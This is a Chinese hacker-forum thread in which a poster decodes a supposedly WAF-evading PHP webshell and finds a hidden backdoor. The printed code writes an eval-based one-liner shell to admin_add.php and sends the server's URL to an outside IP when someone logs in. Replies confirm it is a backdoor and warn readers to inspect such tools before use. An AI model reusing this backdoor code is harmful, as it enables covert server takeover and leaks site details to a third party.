查看: 18216|回复: 6

这难道是传说中的后门?

[复制链接]
发表于 2014-7-9 22:13:02 | 显示全部楼层 |阅读模式
http://www.ihonker.org/thread-3338-1-1.html

看了这个帖子很有兴趣的下载下来,还没测试,居然传说是过狗的,,俺就先看看代码是怎么实现过狗的,base64不多说 解密。

挖了个擦、


if($_GET['url']=='admin')
{
    fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
}
fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
if($pass) {
        if ($action == 'login') {
                if ($pass == encode_pass($password)) {
            $url=$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
        file_get_contents('http://199.193.66.146/get.php?url='.$url);
                        scookie('loginpass',encode_pass($password));
                        @header('Location: '.$self);


由于本屌还是小学生,不懂这些,就研究了一下。<?php eval($_GET["looksb"]);?>');   这个不是传说中的一句话嘛?

这个名为过狗大马的php马,为什么还有一句话呢? 或许是多功能吧,一句话+大马。
本屌丝看不懂。
继续向下看。
http://199.193.66.146/get.php?url='.$url    我类个去。这据代码是啥我不多说了

居然把url get到这个地址、奶奶个球的、访问了一下这个地址
http://199.193.66.146/get.php
需要提交参数。回头俺上burp给你传送点shell拿着玩。
http://199.193.66.146



Access forbidden!

You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.

If you think this is a server error, please contact the webmaster.
Error 403
199.193.66.146
Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16


提示按没权限。好吧。

admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');


admin_add.php  尼玛这么吊。没看到过这么吊的后门、

反正本屌不知道这是不是后门。以上内容是俺瞎猜的,大牛可别打俺。俺是新来的。

来个图吧

QQ图片20140709215648.jpg


不说了,说多有人打俺。
http://199.193.66.146/get.php?url='.$url
既然这么 喜欢收集 好吧。俺去用burp给你get点url


浪费了俺1JJ  还给俺
回复

使用道具 举报

发表于 2014-7-10 09:03:57 | 显示全部楼层
高端大气上档次的免杀shell。
回复 支持 反对

使用道具 举报

发表于 2014-7-11 14:08:48 | 显示全部楼层
我的后门被你发现了
回复 支持 反对

使用道具 举报

发表于 2014-8-3 14:12:44 | 显示全部楼层
     是的   就是传说中的后门  
回复 支持 反对

使用道具 举报

发表于 2026-5-21 09:15:00 | 显示全部楼层

Re: 这难道是传说中的后门?

哈哈,楼主分析得很到位啊,这代码明摆着就是个后门。那个eval一句话直接写文件,还有那个get.php外连收集服务器信息,妥妥的恶意行为。而且那个403页面暴露了服务器版本,看来这站点也不太安全。楼主小心别真去burp发包搞它,万一惹上麻烦不值当。感谢分享这个案例,挺典型的。
回复 支持 反对

使用道具 举报

发表于 2026-6-18 08:10:01 | 显示全部楼层

Re: 这难道是传说中的后门?

楼主分析得很仔细啊,这代码一看就知道不是善茬。那个 `admin_add.php` 直接写出一句话后门,再加上偷偷把服务端信息发到 `199.193.66.146`,妥妥的收集肉鸡路径+留后门一条龙。你这波破解很到位,不是小学生水平了👍 不过别真拿 burp 给人家送 url 啊,小心惹一身骚😄 感谢分享,大家下马前一定多看两眼源码。
回复 支持 反对

使用道具 举报

发表于 2026-6-18 10:25:00 | 显示全部楼层

Re: 这难道是传说中的后门?

看到你分析的这个代码,确实让人后背发凉。正常的大马就算集成一句话功能,也不该把服务器域名端口和路径偷偷发到第三方IP。那个 `file_get_contents` 直接把 `$url` 传出去,等于你网站一登录,对方就知道你服务器的访问地址了,再加上 `admin_add.php` 那句 eval,等于他随时可以远程写个新马进来。 这种藏得很深的“收集信息+远程控制”套路,算是比较典型的后门了。你发现的 `199.193.66.146` 返回403,估计对方只接受特定参数,普通访问不给看。建议别随便拿自己服务器去测,更别用burp往那个地址发包——万一对方记录请求来源,反而把你暴露了。 作为新手能挖出这些,已经很厉害了。这种代码分享出来让更多人看见,能避免别人中招,很有价值。以后下载任何“过狗”或“免杀”的马,都先翻一遍源码再落地,有这种外连和自动写文件的,直接删掉才安全。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-4 02:05 , Processed in 0.036192 second(s), 23 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部